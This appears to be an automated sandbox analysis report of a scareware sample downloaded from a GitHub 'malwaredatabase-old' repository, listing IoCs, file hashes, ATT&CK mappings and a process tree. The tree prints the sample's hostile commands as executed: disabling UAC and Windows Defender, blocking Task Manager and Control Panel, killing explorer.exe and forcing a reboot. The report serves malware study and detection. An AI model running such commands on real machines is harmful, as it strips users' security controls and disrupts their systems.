Analysis
max time kernel: 151s
max time network: 161s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 23-08-2024 22:32

Static task: static1
URLScan task: urlscan1

Behavioral task: behavioral1
Sample: https://github.com/pankoza2-pl/malwaredatabase-old
Resource: win11-20240802-en

Behavioral task: behavioral2
Sample: https://github.com/pankoza2-pl/malwaredatabase-old
Resource: macos-20240711.1-en
Errors
General
Target
https://github.com/pankoza2-pl/malwaredatabase-old
Malware Config
Signatures
UAC bypass
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Disables Task Manager via registry modification

Downloads MZ/PE file
Executes dropped EXE 3 IoCs
pid | Process
352 | ScaryInstaller.exe
1636 | CreepScreen.exe
252 | melter.exe

YARA rule matches: upx
resource | yara_rule
behavioral1/files/0x000500000002ab12-343.dat | upx
behavioral1/memory/352-369-0x0000000000400000-0x0000000001DFD000-memory.dmp | upx
behavioral1/memory/352-404-0x0000000000400000-0x0000000001DFD000-memory.dmp | upx
behavioral1/memory/352-423-0x0000000000400000-0x0000000001DFD000-memory.dmp | upx
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
38 | raw.githubusercontent.com
40 | raw.githubusercontent.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | reg.exe
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\ScaryInstaller.exe:Zone.Identifier | msedge.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CreepScreen.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ScaryInstaller.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | melter.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | shutdown.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Delays execution with timeout.exe 3 IoCs
pid | Process
708 | timeout.exe
2528 | timeout.exe
3320 | timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Kills process with taskkill 3 IoCs
pid | Process
4640 | taskkill.exe
3432 | taskkill.exe
1268 | taskkill.exe
Modifies data under HKEY_USERS 15 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "253" | LogonUI.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings | cmd.exe
Modifies registry key 1 TTPs 3 IoCs
pid | Process
4600 | reg.exe
656 | reg.exe
2372 | reg.exe
NTFS ADS 2 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 253152.crdownload:SmartScreen | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\ScaryInstaller.exe:Zone.Identifier | msedge.exe
Runs net.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
832 | vlc.exe
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid | Process
3188 | msedge.exe (x2)
3192 | msedge.exe (x2)
1448 | identity_helper.exe (x2)
1892 | msedge.exe (x2)
620 | msedge.exe (x2)
3688 | msedge.exe (x4)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
832 | vlc.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid | Process
3192 | msedge.exe (x7)
Suspicious use of AdjustPrivilegeToken 9 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4640 | taskkill.exe
Token: SeDebugPrivilege | 3432 | taskkill.exe
Token: SeDebugPrivilege | 1268 | taskkill.exe
Token: 33 | 3784 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 3784 | AUDIODG.EXE
Token: 33 | 832 | vlc.exe
Token: SeIncBasePriorityPrivilege | 832 | vlc.exe
Token: SeShutdownPrivilege | 3712 | shutdown.exe
Token: SeRemoteShutdownPrivilege | 3712 | shutdown.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process
3192 | msedge.exe (x56)
832 | vlc.exe (x8)
Suspicious use of SendNotifyMessage 14 IoCs
pid | Process
3192 | msedge.exe (x14)
Suspicious use of SetWindowsHookEx 7 IoCs
pid | Process
1636 | CreepScreen.exe
832 | vlc.exe (x4)
896 | PickerHost.exe
1940 | LogonUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
Distinct rows (the report lists 64 entries, most of them repeats of the rows below):
description | pid | Process | procid_target
PID 3192 wrote to memory of 340 | 3192 | msedge.exe | 81
PID 3192 wrote to memory of 464 | 3192 | msedge.exe | 82
PID 3192 wrote to memory of 3188 | 3192 | msedge.exe | 83
PID 3192 wrote to memory of 2144 | 3192 | msedge.exe | 84
Processes
(process tree; indentation shows parent/child depth)

PID 3192  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    PID 340  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb03e23cb8,0x7ffb03e23cc8,0x7ffb03e23cd8

    PID 464  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2

    PID 3188  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    PID 2144  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8

    PID 1488  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

    PID 2380  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

    PID 1448  C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    PID 3400  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1

    PID 3424  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

    PID 2968  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1

    PID 5044  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

    PID 1892  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    PID 1956  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1

    PID 3432  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 /prefetch:8

    PID 620  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
      - Subvert Trust Controls: Mark-of-the-Web Bypass
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses

    PID 352  C:\Users\Admin\Downloads\ScaryInstaller.exe
      cmd: "C:\Users\Admin\Downloads\ScaryInstaller.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery

        PID 4004  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61EC.tmp\creep.cmd" "
          - System Location Discovery: System Language Discovery
          - Modifies registry class

            PID 4640  C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im explorer.exe
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken

            PID 1636  C:\Users\Admin\AppData\Local\Temp\61EC.tmp\CreepScreen.exe
              cmd: CreepScreen.exe
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious use of SetWindowsHookEx

            PID 708  C:\Windows\SysWOW64\timeout.exe
              cmd: timeout 5 /nobreak
              - System Location Discovery: System Language Discovery
              - Delays execution with timeout.exe

            PID 252  C:\Users\Admin\AppData\Local\Temp\61EC.tmp\melter.exe
              cmd: melter.exe
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery

            PID 2528  C:\Windows\SysWOW64\timeout.exe
              cmd: timeout 10 /nobreak
              - System Location Discovery: System Language Discovery
              - Delays execution with timeout.exe

            PID 3432  C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im CreepScreen.exe
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken

            PID 1268  C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im melter.exe
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken

            PID 832  C:\Program Files\VideoLAN\VLC\vlc.exe
              cmd: "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\61EC.tmp\scarr.mp4"
              - Suspicious behavior: AddClipboardFormatListener
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SetWindowsHookEx

            PID 2456  C:\Windows\SysWOW64\reg.exe
              cmd: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
              - Sets desktop wallpaper using registry
              - System Location Discovery: System Language Discovery

            PID 4560  C:\Windows\SysWOW64\rundll32.exe
              cmd: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
              - System Location Discovery: System Language Discovery

            PID 4600  C:\Windows\SysWOW64\reg.exe
              cmd: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
              - System Location Discovery: System Language Discovery
              - Modifies registry key

            PID 656  C:\Windows\SysWOW64\reg.exe
              cmd: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              - UAC bypass
              - System Location Discovery: System Language Discovery
              - Modifies registry key

            PID 3080  C:\Windows\SysWOW64\reg.exe
              cmd: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
              - System Location Discovery: System Language Discovery

            PID 2372  C:\Windows\SysWOW64\reg.exe
              cmd: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              - System Location Discovery: System Language Discovery
              - Modifies registry key

            PID 3252  C:\Windows\SysWOW64\reg.exe
              cmd: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
              - System Location Discovery: System Language Discovery

            PID 4412  C:\Windows\SysWOW64\net.exe
              cmd: net user Admin /fullname:"IT'S TOO LATE!!!"
              - System Location Discovery: System Language Discovery

                PID 4516  C:\Windows\SysWOW64\net1.exe
                  cmd: C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
                  - System Location Discovery: System Language Discovery

            PID 3320  C:\Windows\SysWOW64\timeout.exe
              cmd: timeout 8 /nobreak
              - System Location Discovery: System Language Discovery
              - Delays execution with timeout.exe

            PID 3712  C:\Windows\SysWOW64\shutdown.exe
              cmd: shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken

    PID 3688  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5960 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses

PID 2932  C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

PID 1872  C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

PID 3784  C:\Windows\system32\AUDIODG.EXE
  cmd: C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004D0
  - Suspicious use of AdjustPrivilegeToken

PID 896  C:\Windows\System32\PickerHost.exe
  cmd: C:\Windows\System32\PickerHost.exe -Embedding
  - Suspicious use of SetWindowsHookEx

PID 1940  C:\Windows\system32\LogonUI.exe
  cmd: "LogonUI.exe" /flags:0x4 /state0:0xa39cc855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network

MITRE ATT&CK Enterprise v15
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (1)
    Disable or Modify Tools (1)
  Modify Registry (3)
  Subvert Trust Controls (1)
    SIP and Trust Provider Hijacking (1)
Downloads

Filesize: 152B
MD5: 70e969d4a2b40aef8eb0736379c0bcfb
SHA1: 608c4fdf0e6b820eed23b793884e11210b32be58
SHA256: 82e6cd647225c2781d32207ca56e1bf5e85dddabdfdf67a469c6e8910062975c
SHA512: e38f13e75d7a74400b1c21be8c5d8045c366078c4bfd7a25de86a872a22db8b383484c4f044d433f557ba3f181670398eeb7322fb6946a3bfff03875576b596d

Filesize: 152B
MD5: fc36221d3cc9a4657faeb51e3ea7023a
SHA1: 22e3f8e68b2dd3992d544f8ca57c48c6878f77f9
SHA256: f393d5cc1a1b59d1bf0f19ade21515652b60bdea4b2d11780b904eb90fdd7b4b
SHA512: 1d831b911b8e6970f3c829d7aed3c7d0faeb3f986fa029c8db8e2b2ced40898ad96b26311e620300ecd6d5a71f444582052b9ae11c4231224010096105bdb117

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 2KB
MD5: 0189b12160bfb5d4cf817a3bb0a415d7
SHA1: 03ac35ea0bc9089d320e972eb148c2fa80da811a
SHA256: fdcecd4977cc68071404063bb31000c770337b2896d50625dddc81f3f727a580
SHA512: c52e6fc8ca012fb2c14d02a0cdbec271ef3910583ff63311cbf89bd19c8c6faacb08926cd2f25f3f00b4d1d47a204d5d26539fe0896326ee1ec1d3a449a2d2a0

Filesize: 496B
MD5: 30322550d9f9c54f345ea1c71f3b2e8f
SHA1: b5a3cff2995147279c2bbed7c03b2280ecb286e5
SHA256: 4e7798d8476361378f8fbfb0442db63c7f6bf7e1830d50808bfdb8a58700d8f9
SHA512: 261d1f5bc9c8a369f815eb846c252f54681f70862153bd49959411450870207b3ee240cc9016533c27401922527d561cc1ea7bb23708e4a257f071d010cf55ef

Filesize: 5KB
MD5: 7be4d708c39f64a4064702faece3b745
SHA1: 7c56df7a8130161bab9797fc66343f2bb7070cb4
SHA256: 1702bef59efad48b34c3dd3726d926eebac4e60d8c4bff9da68da8d12c8a4175
SHA512: 7b7f511cce53b6a6dedfa5136a48aca321fcb88cfee73e079bea85b94d8a06587af8f823729f10071145a61d57dddc1dd7459071668b39528323de1850548629

Filesize: 5KB
MD5: 929adeefd6d0beba762f57e5e2f14ebf
SHA1: 0f6fa337be0c53bf19a116264c6813a2b9f4b469
SHA256: fbc70bd4bda225f89f56a1208b51300c3ed9ef63c0eb05f2d250cf12fa117e91
SHA512: c516e333b1083bf36aeda8fddb3ce9d292c9b3f8667b219bb2eb2613b35722140e0dca71d0c116e1490235696a21a4e735e19ff590cfd5ce4fb742fcec11768a

Filesize: 5KB
MD5: dff6af21563d5ad2709aea894622efb0
SHA1: 6b3fadd073217ec7986f622e38c872733cbcf415
SHA256: b13941caa3dae98c9988af179ee0067efa9b3406b709abd07194ed498b2ea76d
SHA512: 32c57f7b8de9d03065d99c53952085d324f63955b0fb2b6c494394e6b619002c8f419511e616c8ceeae601c5aa7dc935d0a12ee89e88fd095b576ad380d93cca

Filesize: 5KB
MD5: 86597e1962b9ea3980eb0747b04e5664
SHA1: 4b8a9092bb93d441044cf0a4fd48b71ddde3ebe4
SHA256: 84c7d8025b256358ce13d60c5446c773a605211a50e7c04a6d2387eaf64a582a
SHA512: c025a694b455cf7cca46269a4282188bd695679abb48573beb5002da116528f207065eb558d962b4414650f76edcfc8cdd5bca6deec2ae83128e4fc00e61a4b9

Filesize: 25KB
MD5: 8c0d6616af07f61a695d23555f03afb5
SHA1: 4d920d7f35be99217c86ea4dc2396a55e960a537
SHA256: ecc17c289b6a0f4fe10cae7e9eed2413279d3d4354d82fcc9bc672b7bd7493aa
SHA512: f903fe7977d14cc2d021bbf54f103421d0500cbf7b7f3cfd4ba93ae56af294307ec1b7d82c93d1fb530bb132ef4d009aa244ce2a60c23d7748b5ca08e4c7a2d0

Filesize: 874B
MD5: f336f8a39568d18123d2994d96a2eb41
SHA1: 5846457d93d19d837e0b35a61e9f917215a366d9
SHA256: ddc41edb1416d0f7773cfc998a34042c5ca7117e9e4eea0ef98442e27f46f1f0
SHA512: 4743163ffc5acc771d683f08f4476876853ddc46f47402d7c7c543ebd9d0a315e23a60a4777157d7daa3dc0376b5e12ff127755d66f884b1d466958b60bf2873

Filesize: 1KB
MD5: 248203ea708a830701c19b699e83d654
SHA1: 9bb1c10a8c43b17cc0eb59625dfa90cc3f8eb915
SHA256: 886eeb486b61e33ba9b6bb1a34712efb27f118f7539c46b7510a4d62e35e6587
SHA512: 9cac1c21da512bfbb191ad87d689c620e007f1b35927b89ec93026a3a17de2cd81b7f67a8112d98f26ebaa7046500d41110d8eb4ef519950a5feb70defebb42d

Filesize: 874B
MD5: cdbc52dc723f5fcb79a910cbf628df0b
SHA1: 1b8e283ffea377b4e32c087d50ab220e934ffefe
SHA256: ea6ea0d904cfd880ee4d66a872cd4662e8e487dcd9f1cbf0a6a4d9185eb921f9
SHA512: a110be4133ab57cf5a801d168636fc2a746c1d46cb01c2e384eab37cd9bb45c0d5cc9e5044a5f3af04f7fdf6c21c8c69b4c0eb2226c7a774db23fdefbdda3a97

Filesize: 874B
MD5: 53e5499039f5b3d0033cab8015e1e2ef
SHA1: 965feb501b36a4a199eca0cb6ee8c4096f678cd8
SHA256: ec5cbe6d2cb1c419d39dd85bcfd021fed5d875f2cfe641c36b0557d874ab5e56
SHA512: 2c9a03c3921781e551ef8cfc7aa99fe34a96442284ba4fc04cf0a7d4ffa40114c37063e19d8680fd5ab01836c8b5752fc8ba8c1b75a1f4ad3f677f2128968f53

Filesize: 874B
MD5: da78117e90d34c970dccd54e8df9bb1d
SHA1: 6b2ffaa996ffc41fd06f8c992c1f98a2d036559f
SHA256: e1d81d10065dd45f3ec87a9743a1d829d506535411d9fa3f9deea0bd0a36c912
SHA512: 8462edb7e7fac50afbcd08323fef7b10096843e03c2052c8c2f9e4abd498e2851fac1e51516d2071b90a771114f20cc064efb947ed92890830015840ca73e830

Filesize: 16B
